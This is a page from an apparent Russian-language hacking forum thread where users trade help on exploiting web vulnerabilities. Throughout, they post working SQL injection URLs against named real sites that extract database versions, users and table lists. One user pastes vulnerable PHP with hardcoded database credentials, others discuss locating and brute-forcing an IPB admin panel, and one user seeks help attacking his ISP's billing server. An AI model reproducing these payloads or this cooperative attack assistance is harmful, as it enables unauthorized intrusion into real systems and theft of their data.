Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.citycollege.ac.cy/link.php?id=-1+union+select+222,version(),1/*
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,concat_ws(0x3a,user(),version(),database()),user()--
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    http://amxbans.snakearena.net/ban_details.php?bid=-1+union+select+1,2,3,4,5,6
    вроде как инъекция, но ничего не выводит...
     
  4. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    https://forum.antichat.ru/showpost.php?p=1108085&postcount=2
    https://forum.antichat.ru/showpost.php?p=1108479&postcount=3
     
  5. Worms

    Worms Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    95
    Likes Received:
    0
    Reputations:
    0
    подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
    Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
     
  6. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    похоже на XSS. Вообще по такому описанию сказачть оч сложно. или давай ссылку(!!!!!) или расписывай подробнее.
     
  7. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    пробую эту фишку - http://forum.antichat.ru/showpost.php?p=663815&postcount=2
    скуля, 8 полей,во второе вттыкаю кавычку в хексе,вылазает ошибка,пробую подобрать во втором запросе колонки,ниче не получаеццо ( скрипт прочитал бажный, вот код, должна ли тут работать эта фишка или меня глючит?
    PHP:
    <?php

    // Libraries
    include '../php-bin/PageFunctions.php';
    include 
    '../php-bin/lib/querylib.php';

    $nid = @$_GET['nid'];
    $category = @$_GET['category'];

    // If no nid, exit
    if ($nid == "")
    {
        echo(
    "Error: no article ID");
        exit;
    }

    // Create a PageFunctions object
    $objPFunc = new PageFunctions();

    $query = new Query('localhost''root''4dm1n777'"www");

    // Year hash
    $tmonth = array();
    $tmonth['1'] = "January";
    $tmonth['2'] = "February";
    $tmonth['3'] = "March";
    $tmonth['4'] = "April";
    $tmonth['5'] = "May";
    $tmonth['6'] = "June";
    $tmonth['7'] = "July";
    $tmonth['8'] = "August";
    $tmonth['9'] = "September";
    $tmonth['10'] = "October";
    $tmonth['11'] = "November";
    $tmonth['12'] = "December";

    $getitem $query->SQL("select * from newsitem where nid = " $nid " limit 1");
    $item mysql_fetch_assoc($getitem);

    $gettext $query->SQL("select * from newstext where nid = " $nid " limit 1");
    $text mysql_fetch_assoc($gettext);

    $getcat $query->SQL("select ctitle from newscategory where cid = " $item['cid'] . " limit 1");
    $cattext mysql_fetch_assoc($getcat);

    $query->Disconnect();

    ?>
    add: бажный параметр - nid
     
    #5607 Napas, 25 Feb 2009
    Last edited: 25 Feb 2009
  8. Worms

    Worms Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    95
    Likes Received:
    0
    Reputations:
    0
    вот сделал скрин- http://pic.rapidshare.ru/941552 оригинала и что получается
     
  9. cr0w

    cr0w Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    92
    Likes Received:
    141
    Reputations:
    33
    Napas

    А зачем ты подбираешь количество колонок, когда там без вариантов одна колонка?
     
    2 people like this.
  10. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    2 cr0w
    хмм, всмысле во внутреннем запросе?
    так должен прокатить трюк со внутренним запросом или нет? и если да,как его реализовать,а то чет у меня мозгов не хватает :(
     
  11. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://molod.karelia.ru/portal/page/portal/molod/main/kur?art=5' Скуль или нет?
     
  12. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2Assembler
    http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=2+and+1=1+--+
    вот скуль)) blind))

    http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+1,2,3,4,5,6,7,8,9,0,1+from+news+--+
    http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+null,null,null,null,null,null,null,null,null,null,null+from+news+--+
     
    #5612 j0ker13, 26 Feb 2009
    Last edited: 26 Feb 2009
    1 person likes this.
  13. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    а вот и все таблички
    http://molod.karelia.ru/portal/page/portal/molod/main/Officially?loc=-2+union+select+table_name,null,null,null,null,null,null,null,null,null,null+from+sys.user_tables+--+
     
    1 person likes this.
  14. ICQ Hool

    ICQ Hool Elder - Старейшина

    Joined:
    31 Mar 2008
    Messages:
    175
    Likes Received:
    25
    Reputations:
    0
    скажите пожалуйста как найти админку в ipb <=2.3.5 если она не по дефолту admin =(
    чем поперебирать или где найти?
     
  15. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Обычно когда логинешься под админом акком, просто на форуме в смысле, то пояляеться линк на админку, ну или брут скриптом.
     
  16. ICQ Hool

    ICQ Hool Elder - Старейшина

    Joined:
    31 Mar 2008
    Messages:
    175
    Likes Received:
    25
    Reputations:
    0
    AkyHa_MaTaTa, залогинился, нет ссылки =(
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/showpost.php?p=1064972&postcount=593
     
  18. svalck

    svalck Member

    Joined:
    24 Mar 2008
    Messages:
    79
    Likes Received:
    7
    Reputations:
    0
    подскажите программы-сканеры (или ветку где обсуждалось и заливалось) для sql иньекций.. для полуавтоматической подстановки полей ... и т.д. типа SIPT 4
    спасиба
     
    #5618 svalck, 26 Feb 2009
    Last edited: 26 Feb 2009
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 svalck http://forum.antichat.ru/thread24918-SIPT.html
     
  20. ICQ Hool

    ICQ Hool Elder - Старейшина

    Joined:
    31 Mar 2008
    Messages:
    175
    Likes Received:
    25
    Reputations:
    0
    Pashkela, ничего толкового не нашел, я думал есть способ проще =((
     
Thread Status:
Not open for further replies.